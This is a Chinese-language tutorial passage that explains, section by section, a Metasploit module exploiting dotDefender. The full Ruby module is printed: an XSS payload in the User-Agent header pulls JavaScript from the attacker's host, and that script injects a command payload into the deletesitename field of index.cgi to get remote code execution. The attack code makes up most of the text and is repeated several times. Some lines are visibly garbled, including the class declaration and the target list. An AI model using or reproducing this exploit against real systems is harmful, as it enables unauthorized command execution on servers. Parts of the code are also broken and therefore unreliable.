在本节中,我们将为侦听添加侦听器和JavaScript。突出显示利用的更改。
内容
1、请求URI
2、内容
3、发送回复HTML
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "dotDefender %q{
This module exploits a vulnerability found in dotDefender.
},
'License' => MSF_LICENSE,
'Author' =>
[
'John Dos', #Initial remote execution discovery
'rAWjAW' #Everything else
],
'References' =>
[
['EDB', '14310'],
['URL', 'http://www.exploit-db.com/exploits/14310/']
],
'Arch' => ARCH_CMD,
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix','linux'],
'Targets' =>
[
['dotDefender false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('TRIGGERLOG', [true, 'This is what is used to trigger a log entry.','<script>alert(\'xss\')>/script>']),
OptString.new('SITENAME', [true, 'This is usually the same as RHOST but is available as an option if different']),
OptString.new('LHOST', [true, 'This is the IP to connect back to for the javascript','0.0.0.0']),
OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','DotDefender.js']),
OptString.new('SRVPORT', [true, 'This is the port for the javascript to connect back to','80'])
], self.class)
end
def exploit
resp = send_request_raw({
'uri' => "http://#{rhost}/",
'version' => '1.1',
'method' => 'GET',
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => "Mozilla Firefox <script language=\"JavaScript\" src=\"http://#{datastore['lhost']}:#{datastore['SRVPORT']}/#{datastore['uripath']}\">>/script>",
},
'data' => "#{datastore['TRIGGERLOG']}"
})
super
end
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
sitename = datastore['SITENAME']
content = %Q|
var http = new XMLHttpRequest();
var url = "../index.cgi";
var params = "sitename=#{sitename}&deletesitename=#{sitename};#{payload.encoded};&action=deletesite&linenum=14";
http.open("POST",url,true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection","close");
http.conreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
alert(http.responseText);
}
}
http.send(params);
var http2 = new XMLHttpRequest();
var params2 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http2.open("POST",url,true);
http2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http2.setRequestHeader("Content-lenth", params2.length);
http2.setRequestHeader("Connection","close");
http2.conreadystatechange = function() {
if(http2.readyState == 4 && http2.status == 200) {
alert(http2.responseText);
}
}
http2.send(params2);
var http3 = new XMLHttpRequest();
var params3 = "newsitename=#{sitename}&action=newsite";
http3.open("POST",url,true);
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-lenth", params3.length);
http3.setRequestHeader("Connection","close");
http3.conreadystatechange = function() {
if(http3.readyState == 4 && http3.status == 200) {
alert(http3.responseText);
}
}
http3.send(params3);
var http4 = new XMLHttpRequest();
var params4 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http4.open("POST",url,true);
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-lenth", params4.length);
http4.setRequestHeader("Connection","close");
http4.conreadystatechange = function() {
if(http4.readyState == 4 && http4.status == 200) {
alert(http4.responseText);
}
}
http4.send(params4);
|
print_status("Sending #{self.name}")
send_response_html(cli, content)
end
end
一、请求URI
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
sitename = datastore['SITENAME']
我们在这里设置metasploit中的监听器。该列表将有两个参数,cli和request。我们希望重新生成有效负载,并确保它不是nill,同时建立sitename变量。
二、内容
content = %Q|
var http = new XMLHttpRequest();
var url = "../index.cgi";
var params = "sitename=#{sitename}&deletesitename=#{sitename};#{payload.encoded};&action=deletesite&linenum=14";
http.open("POST",url,true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection","close");
http.conreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
alert(http.responseText);
}
}
http.send(params);
var http2 = new XMLHttpRequest();
var params2 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http2.open("POST",url,true);
http2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http2.setRequestHeader("Content-lenth", params2.length);
http2.setRequestHeader("Connection","close");
http2.conreadystatechange = function() {
if(http2.readyState == 4 && http2.status == 200) {
alert(http2.responseText);
}
}
http2.send(params2);
var http3 = new XMLHttpRequest();
var params3 = "newsitename=#{sitename}&action=newsite";
http3.open("POST",url,true);
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-lenth", params3.length);
http3.setRequestHeader("Connection","close");
http3.conreadystatechange = function() {
if(http3.readyState == 4 && http3.status == 200) {
alert(http3.responseText);
}
}
http3.send(params3);
var http4 = new XMLHttpRequest();
var params4 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http4.open("POST",url,true);
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-lenth", params4.length);
http4.setRequestHeader("Connection","close");
http4.conreadystatechange = function() {
if(http4.readyState == 4 && http4.status == 200) {
alert(http4.responseText);
}
}
http4.send(params4);
|
print_status("Sending #{self.name}")
如果我们回想一下分析漏洞,我们在这个JavaScript中有四个不同的地方,我们必须使用变量。这些在下面的代码中突出显示。
content = %Q|
var http = new XMLHttpRequest();
var url = "../index.cgi";
var params = "sitename=#{sitename}&deletesitename=#{sitename};#{payload.encoded};&action=deletesite&linenum=14";
http.open("POST",url,true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection","close");
http.conreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
alert(http.responseText);
}
}
http.send(params);
var http2 = new XMLHttpRequest();
var params2 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http2.open("POST",url,true);
http2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http2.setRequestHeader("Content-lenth", params2.length);
http2.setRequestHeader("Connection","close");
http2.conreadystatechange = function() {
if(http2.readyState == 4 && http2.status == 200) {
alert(http2.responseText);
}
}
http2.send(params2);
var http3 = new XMLHttpRequest();
var params3 = "newsitename=#{sitename}&action=newsite";
http3.open("POST",url,true);
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-lenth", params3.length);
http3.setRequestHeader("Connection","close");
http3.conreadystatechange = function() {
if(http3.readyState == 4 && http3.status == 200) {
alert(http3.responseText);
}
}
http3.send(params3);
var http4 = new XMLHttpRequest();
var params4 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
http4.open("POST",url,true);
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-lenth", params4.length);
http4.setRequestHeader("Connection","close");
http4.conreadystatechange = function() {
if(http4.readyState == 4 && http4.status == 200) {
alert(http4.responseText);
}
}
http4.send(params4);
|
print_status("Sending #{self.name}")
如果您注意到我们还在JavaScript的末尾添加了print_status。这将使我们看到,我们已经成功地将有效载荷发送到浏览器。
三、发送回复HTML
send_response_html(cli, content)
一旦它们连接到metasploit主机,这将发送实际的JavaScript代码给客户端。